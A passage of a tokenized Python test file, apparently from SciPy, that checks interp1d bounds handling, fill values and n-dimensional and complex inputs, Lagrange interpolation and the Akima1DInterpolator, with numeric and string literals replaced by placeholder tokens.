<NUM_LIT:1> ] , self . y210 [ : , : : - <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( interp10_y_2d ( self . x10 ) , <EOL> interp10_y_2d_unsorted ( self . x10 ) ) <EOL> def test_linear ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( [ <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> extrapolator = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' ) <EOL> assert_allclose ( extrapolator ( [ - <NUM_LIT:1.> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:11> ] ) , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:11> ] , rtol = <NUM_LIT> ) <EOL> opts = dict ( kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' , <EOL> bounds_error = True ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , ** opts ) <EOL> def test_linear_dtypes ( self ) : <EOL> for dtyp in np . sctypes [ "<STR_LIT:float>" ] : <EOL> x = np . arange ( <NUM_LIT:8> , dtype = dtyp ) <EOL> y = x <EOL> yp = interp1d ( x , y , kind = '<STR_LIT>' ) ( x ) <EOL> assert_equal ( yp . dtype , dtyp ) <EOL> assert_allclose ( yp , y , atol = <NUM_LIT> ) <EOL> def test_cubic ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( [ <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , ) <EOL> def test_nearest ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( <NUM_LIT:1.> ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , ) <EOL> extrapolator = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' ) <EOL> assert_allclose ( extrapolator ( [ - <NUM_LIT:1.> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:11> ] ) , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:9> ] , rtol = <NUM_LIT> ) <EOL> opts = dict ( kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' , <EOL> bounds_error = True ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , ** opts ) <EOL> @ dec . knownfailureif ( True , "<STR_LIT>" ) <EOL> def test_zero ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( <NUM_LIT:1.> ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> def _bounds_check ( self , kind = '<STR_LIT>' ) : <EOL> extrap10 = interp1d ( self . x10 , self . y10 , fill_value = self . fill_value , <EOL> bounds_error = False , kind = kind ) <EOL> assert_array_equal ( extrap10 ( <NUM_LIT> ) , np . array ( self . fill_value ) ) <EOL> assert_array_equal ( extrap10 ( - <NUM_LIT> ) , np . array ( self . fill_value ) ) <EOL> assert_array_equal ( extrap10 ( [ [ [ <NUM_LIT> ] , [ - <NUM_LIT> ] , [ <NUM_LIT> ] , [ <NUM_LIT> ] ] ] ) , <EOL> np . array ( self . fill_value ) , ) <EOL> assert_array_equal ( extrap10 . _check_bounds ( <EOL> np . array ( [ - <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) , <EOL> np . array ( [ [ True , False , False , False , False ] , <EOL> [ False , False , False , False , True ] ] ) ) <EOL> raises_bounds_error = interp1d ( self . x10 , self . y10 , bounds_error = True , <EOL> kind = kind ) <EOL> assert_raises ( ValueError , raises_bounds_error , - <NUM_LIT:1.0> ) <EOL> assert_raises ( ValueError , raises_bounds_error , <NUM_LIT> ) <EOL> raises_bounds_error ( [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def _bounds_check_int_nan_fill ( self , kind = '<STR_LIT>' ) : <EOL> x = np . arange ( <NUM_LIT:10> ) . astype ( np . int_ ) <EOL> y = np . arange ( <NUM_LIT:10> ) . astype ( np . int_ ) <EOL> c = interp1d ( x , y , kind = kind , fill_value = np . nan , bounds_error = False ) <EOL> yi = c ( x - <NUM_LIT:1> ) <EOL> assert_ ( np . isnan ( yi [ <NUM_LIT:0> ] ) ) <EOL> assert_array_almost_equal ( yi , np . r_ [ np . nan , y [ : - <NUM_LIT:1> ] ] ) <EOL> def test_bounds ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _bounds_check ( kind ) <EOL> self . _bounds_check_int_nan_fill ( kind ) <EOL> def _check_fill_value ( self , kind ) : <EOL> interp = interp1d ( self . x10 , self . y10 , kind = kind , <EOL> fill_value = ( - <NUM_LIT:100> , <NUM_LIT:100> ) , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , - <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ - <NUM_LIT:100> , <NUM_LIT:100> ] ) <EOL> for y in ( self . y235 , self . y325 , self . y225 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = <NUM_LIT:100> , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , <NUM_LIT:100> ) <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = ( - <NUM_LIT:100> , <NUM_LIT:100> ) , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , - <NUM_LIT:100> ) <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] ] * y . shape [ <NUM_LIT:1> ] ] * y . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> result = [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] <EOL> for y in ( self . y325 , self . y225 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> interp = interp1d ( self . x5 , self . y235 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ <NUM_LIT:200> , <NUM_LIT:200> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] ] ] * <NUM_LIT:2> ) <EOL> fill_value = [ <NUM_LIT:100> , <NUM_LIT:200> ] <EOL> assert_raises ( ValueError , interp1d , self . x5 , self . y235 , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for y in ( self . y225 , self . y325 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> result = [ <NUM_LIT:100> , <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , result ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , result ) <EOL> result = [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , [ <NUM_LIT:200> , <NUM_LIT:200> ] ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = ( np . array ( [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] ) , <NUM_LIT:100> ) <EOL> for y in ( self . y325 , self . y225 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> interp = interp1d ( self . x5 , self . y235 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT:200> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT:100> ] ] ] * <NUM_LIT:2> ) <EOL> fill_value = ( np . array ( [ - <NUM_LIT:100> , - <NUM_LIT:200> ] ) , <NUM_LIT:100> ) <EOL> assert_raises ( ValueError , interp1d , self . x5 , self . y235 , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for y in ( self . y225 , self . y325 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> result = [ - <NUM_LIT:100> , - <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , result ) <EOL> result = [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , [ - <NUM_LIT:200> , <NUM_LIT:100> ] ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = ( [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] , [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ) <EOL> for y in ( self . y325 , self . y225 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> if ii == <NUM_LIT:1> : <EOL> fill_value = tuple ( np . array ( f ) for f in fill_value ) <EOL> interp = interp1d ( self . x5 , self . y235 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT:200> , <NUM_LIT:200> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] ] ] * <NUM_LIT:2> ) <EOL> fill_value = ( [ - <NUM_LIT:100> , - <NUM_LIT:200> ] , [ <NUM_LIT:100> , <NUM_LIT:200> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x5 , self . y235 , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for y in ( self . y325 , self . y225 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> result = [ <NUM_LIT:100> , <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , result ) <EOL> result = [ - <NUM_LIT:100> , - <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , result ) <EOL> result = [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , [ - <NUM_LIT:200> , <NUM_LIT:200> ] ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] <EOL> for y in ( self . y235 , self . y325 , self . y25 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> if ii == <NUM_LIT:1> : <EOL> fill_value = np . array ( fill_value ) <EOL> interp = interp1d ( self . x5 , self . y225 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ <NUM_LIT:200> , <NUM_LIT:200> ] ] , <EOL> [ [ <NUM_LIT:1000> , <NUM_LIT:1000> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] ] ] ) <EOL> fill_value = ( [ [ - <NUM_LIT:100> , - <NUM_LIT:200> ] , [ - <NUM_LIT:1000> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> for y in ( self . y235 , self . y325 , self . y25 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> if ii == <NUM_LIT:1> : <EOL> fill_value = ( np . array ( fill_value [ <NUM_LIT:0> ] ) , np . array ( fill_value [ <NUM_LIT:1> ] ) ) <EOL> interp = interp1d ( self . x5 , self . y225 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ - <NUM_LIT:100> , - <NUM_LIT:200> ] , <EOL> [ - <NUM_LIT:1000> , - <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT:200> , <NUM_LIT:200> ] ] , <EOL> [ [ - <NUM_LIT:1000> , <NUM_LIT:1000> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] ] ] ) <EOL> def test_fill_value ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> self . _check_fill_value ( kind ) <EOL> def test_fill_value_writeable ( self ) : <EOL> interp = interp1d ( self . x10 , self . y10 , fill_value = <NUM_LIT> ) <EOL> assert_equal ( interp . fill_value , <NUM_LIT> ) <EOL> interp . fill_value = <NUM_LIT> <EOL> assert_equal ( interp . fill_value , <NUM_LIT> ) <EOL> def _nd_check_interp ( self , kind = '<STR_LIT>' ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = kind ) <EOL> assert_array_almost_equal ( interp10 ( np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) , <EOL> np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) <EOL> assert_ ( isinstance ( interp10 ( <NUM_LIT> ) , np . ndarray ) ) <EOL> assert_equal ( interp10 ( <NUM_LIT> ) . shape , ( ) ) <EOL> interp210 = interp1d ( self . x10 , self . y210 , kind = kind ) <EOL> assert_array_almost_equal ( interp210 ( <NUM_LIT:1.> ) , np . array ( [ <NUM_LIT:1.> , <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp210 ( np . array ( [ <NUM_LIT:1.> , <NUM_LIT> ] ) ) , <EOL> np . array ( [ [ <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) <EOL> interp102 = interp1d ( self . x10 , self . y102 , axis = <NUM_LIT:0> , kind = kind ) <EOL> assert_array_almost_equal ( interp102 ( <NUM_LIT:1.> ) , np . array ( [ <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp102 ( np . array ( [ <NUM_LIT:1.> , <NUM_LIT> ] ) ) , <EOL> np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) <EOL> x_new = np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp210 ( x_new ) , <EOL> np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ] ) ) <EOL> assert_array_almost_equal ( interp102 ( x_new ) , <EOL> np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ] ) ) <EOL> def _nd_check_shape ( self , kind = '<STR_LIT>' ) : <EOL> a = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] <EOL> y = np . arange ( np . prod ( a ) ) . reshape ( * a ) <EOL> for n , s in enumerate ( a ) : <EOL> x = np . arange ( s ) <EOL> z = interp1d ( x , y , axis = n , kind = kind ) <EOL> assert_array_almost_equal ( z ( x ) , y , err_msg = kind ) <EOL> x2 = np . arange ( <NUM_LIT:2> * <NUM_LIT:3> * <NUM_LIT:1> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) ) / <NUM_LIT> <EOL> b = list ( a ) <EOL> b [ n : n + <NUM_LIT:1> ] = [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ] <EOL> assert_array_almost_equal ( z ( x2 ) . shape , b , err_msg = kind ) <EOL> def test_nd ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _nd_check_interp ( kind ) <EOL> self . _nd_check_shape ( kind ) <EOL> def _check_complex ( self , dtype = np . complex_ , kind = '<STR_LIT>' ) : <EOL> x = np . array ( [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:10> ] ) <EOL> y = x * x ** ( <NUM_LIT:1> + <NUM_LIT> ) <EOL> y = y . astype ( dtype ) <EOL> c = interp1d ( x , y , kind = kind ) <EOL> assert_array_almost_equal ( y [ : - <NUM_LIT:1> ] , c ( x ) [ : - <NUM_LIT:1> ] ) <EOL> xi = np . linspace ( <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT> ) <EOL> cr = interp1d ( x , y . real , kind = kind ) <EOL> ci = interp1d ( x , y . imag , kind = kind ) <EOL> assert_array_almost_equal ( c ( xi ) . real , cr ( xi ) ) <EOL> assert_array_almost_equal ( c ( xi ) . imag , ci ( xi ) ) <EOL> def test_complex ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> self . _check_complex ( np . complex64 , kind ) <EOL> self . _check_complex ( np . complex128 , kind ) <EOL> @ dec . knownfailureif ( True , "<STR_LIT>" ) <EOL> def test_nd_zero_spline ( self ) : <EOL> pass <EOL> def test_circular_refs ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> with assert_deallocated ( interp1d , x , y ) as interp : <EOL> new_y = interp ( [ <NUM_LIT:0.1> , <NUM_LIT> ] ) <EOL> del interp <EOL> class TestLagrange ( TestCase ) : <EOL> def test_lagrange ( self ) : <EOL> p = poly1d ( [ <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:3> ] ) <EOL> xs = np . arange ( len ( p . coeffs ) ) <EOL> ys = p ( xs ) <EOL> pl = lagrange ( xs , ys ) <EOL> assert_array_almost_equal ( p . coeffs , pl . coeffs ) <EOL> class TestAkima1DInterpolator ( TestCase ) : <EOL> def test_eval ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> xi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> assert_allclose ( ak ( xi ) , yi ) <EOL> def test_eval_2d ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . column_stack ( ( y , <NUM_LIT> * y ) ) <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> xi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . column_stack ( ( yi , <NUM_LIT> * yi ) ) <EOL> assert_allclose ( ak ( xi ) , yi ) <EOL> def test_eval_3d ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y_ = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . empty ( ( <NUM_LIT:11> , <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> y [ : , <NUM_LIT:0> , <NUM_LIT:0> ] = y_ <EOL> y [ : , <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT> * y_ <EOL> y [ : , <NUM_LIT:0> , <NUM_LIT:1> ] = <NUM_LIT> * y_ <EOL> y [ : , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT> * y_ <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> xi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . empty ( ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> yi_ = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi [ : , <NUM_LIT:0> , <NUM_LIT:0> ] = yi_ <EOL> yi [ : , <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT> * yi_ <EOL> yi [ : , <NUM_LIT:0> , <NUM_LIT:1> ] = <NUM_LIT> * yi_ <EOL> yi [ : , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT> * yi_ <EOL> assert_allclose ( ak ( xi ) , yi ) <EOL> def test_degenerate_case_multidimensional ( self ) : <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> y = np . vstack ( ( x , x ** <NUM_LIT:2> ) ) . T <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> x_eval = np . array ( [ <NUM_LIT:0.5> , <NUM_LIT> ] ) <EOL> y_eval = ak ( x_eval ) <EOL> assert_allclose ( y_eval , np . vstack ( ( x_eval , x_eval ** <NUM_LIT:2> ) ) . T ) <EOL> def test_extend ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , 